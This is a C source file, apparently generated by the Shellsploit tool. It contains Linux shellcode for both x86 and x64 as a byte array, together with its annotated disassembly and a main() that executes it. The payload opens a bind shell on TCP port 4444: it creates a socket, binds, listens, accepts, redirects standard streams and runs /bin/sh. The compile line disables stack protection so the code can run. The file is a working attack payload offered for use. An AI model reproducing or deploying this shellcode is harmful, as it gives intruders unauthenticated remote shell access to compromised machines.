/* [+] Author : B3mB4m [~] Contact : b3mb4m@protonmail.com [~] Project : https://github.com/b3mb4m/Shellsploit [~] Greetz : Bomberman,T-Rex,KnocKout,ZoRLu #If you want test it, you must compile it within x86 OS. #Or basically you can get it with shellsploit. #Default setthings for port:4444 00000000 31C0 xor eax,eax 00000002 40 inc eax 00000003 7460 jz 0x65 00000005 31DB xor ebx,ebx 00000007 F7E3 mul ebx 00000009 B066 mov al,0x66 0000000B B301 mov bl,0x1 0000000D 52 push edx 0000000E 53 push ebx 0000000F 6A02 push byte +0x2 00000011 89E1 mov ecx,esp 00000013 CD80 int 0x80 00000015 89C6 mov esi,eax 00000017 B066 mov al,0x66 00000019 43 inc ebx 0000001A 52 push edx 0000001B 6668115C push word 0x5c11 0000001F 6653 push bx 00000021 89E1 mov ecx,esp 00000023 6A10 push byte +0x10 00000025 51 push ecx 00000026 56 push esi 00000027 89E1 mov ecx,esp 00000029 CD80 int 0x80 0000002B B066 mov al,0x66 0000002D B304 mov bl,0x4 0000002F 52 push edx 00000030 56 push esi 00000031 89E1 mov ecx,esp 00000033 CD80 int 0x80 00000035 B066 mov al,0x66 00000037 B305 mov bl,0x5 00000039 52 push edx 0000003A 52 push edx 0000003B 56 push esi 0000003C 89E1 mov ecx,esp 0000003E CD80 int 0x80 00000040 93 xchg eax,ebx 00000041 31C9 xor ecx,ecx 00000043 B102 mov cl,0x2 00000045 B03F mov al,0x3f 00000047 CD80 int 0x80 00000049 49 dec ecx 0000004A 79F9 jns 0x45 0000004C 92 xchg eax,edx 0000004D 50 push eax 0000004E 682F2F7368 push dword 0x68732f2f 00000053 682F62696E push dword 0x6e69622f 00000058 89E3 mov ebx,esp 0000005A 50 push eax 0000005B 53 push ebx 0000005C 89E1 mov ecx,esp 0000005E 50 push eax 0000005F 89E2 mov edx,esp 00000061 B00B mov al,0xb 00000063 CD80 int 0x80 00000065 48 dec eax 00000066 31C0 xor eax,eax 00000068 48 dec eax 00000069 31FF xor edi,edi 0000006B 48 dec eax 0000006C 31F6 xor esi,esi 0000006E 48 dec eax 0000006F 31D2 xor edx,edx 00000071 4D dec ebp 00000072 31C0 xor eax,eax 00000074 6A02 push byte +0x2 00000076 5F pop edi 00000077 6A01 push byte +0x1 00000079 5E pop esi 0000007A 6A06 push byte +0x6 0000007C 5A pop edx 0000007D 6A29 push byte +0x29 0000007F 58 pop eax 00000080 0F05 syscall 00000082 49 dec ecx 00000083 89C0 mov eax,eax 00000085 4D dec ebp 00000086 31D2 xor edx,edx 00000088 41 inc ecx 00000089 52 push edx 0000008A 41 inc ecx 0000008B 52 push edx 0000008C C6042402 mov byte [esp],0x2 00000090 66C7442402115C mov word [esp+0x2],0x5c11 00000097 48 dec eax 00000098 89E6 mov esi,esp 0000009A 41 inc ecx 0000009B 50 push eax 0000009C 5F pop edi 0000009D 6A10 push byte +0x10 0000009F 5A pop edx 000000A0 6A31 push byte +0x31 000000A2 58 pop eax 000000A3 0F05 syscall 000000A5 41 inc ecx 000000A6 50 push eax 000000A7 5F pop edi 000000A8 6A01 push byte +0x1 000000AA 5E pop esi 000000AB 6A32 push byte +0x32 000000AD 58 pop eax 000000AE 0F05 syscall 000000B0 48 dec eax 000000B1 89E6 mov esi,esp 000000B3 48 dec eax 000000B4 31C9 xor ecx,ecx 000000B6 B110 mov cl,0x10 000000B8 51 push ecx 000000B9 48 dec eax 000000BA 89E2 mov edx,esp 000000BC 41 inc ecx 000000BD 50 push eax 000000BE 5F pop edi 000000BF 6A2B push byte +0x2b 000000C1 58 pop eax 000000C2 0F05 syscall 000000C4 59 pop ecx 000000C5 4D dec ebp 000000C6 31C9 xor ecx,ecx 000000C8 49 dec ecx 000000C9 89C1 mov ecx,eax 000000CB 4C dec esp 000000CC 89CF mov edi,ecx 000000CE 48 dec eax 000000CF 31F6 xor esi,esi 000000D1 6A03 push byte +0x3 000000D3 5E pop esi 000000D4 48 dec eax 000000D5 FFCE dec esi 000000D7 6A21 push byte +0x21 000000D9 58 pop eax 000000DA 0F05 syscall 000000DC 75F6 jnz 0xd4 000000DE 48 dec eax 000000DF 31FF xor edi,edi 000000E1 57 push edi 000000E2 57 push edi 000000E3 5E pop esi 000000E4 5A pop edx 000000E5 48 dec eax 000000E6 BF2F2F6269 mov edi,0x69622f2f 000000EB 6E outsb 000000EC 2F das 000000ED 7368 jnc 0x157 000000EF 48 dec eax 000000F0 C1EF08 shr edi,byte 0x8 000000F3 57 push edi 000000F4 54 push esp 000000F5 5F pop edi 000000F6 6A3B push byte +0x3b 000000F8 58 pop eax 000000F9 0F05 syscall */ //Project : https://github.com/b3mb4m/Shellsploit //This file created with shellsploit .. //19/01/2016 - 00:36:45 //Compile : gcc -fno-stack-protector -z execstack shell.c -o shell unsigned char shellcode[] = "\x31\xc0\x40\x74\x60\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x92\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"; int main(void){ (*(void(*)()) shellcode)(); }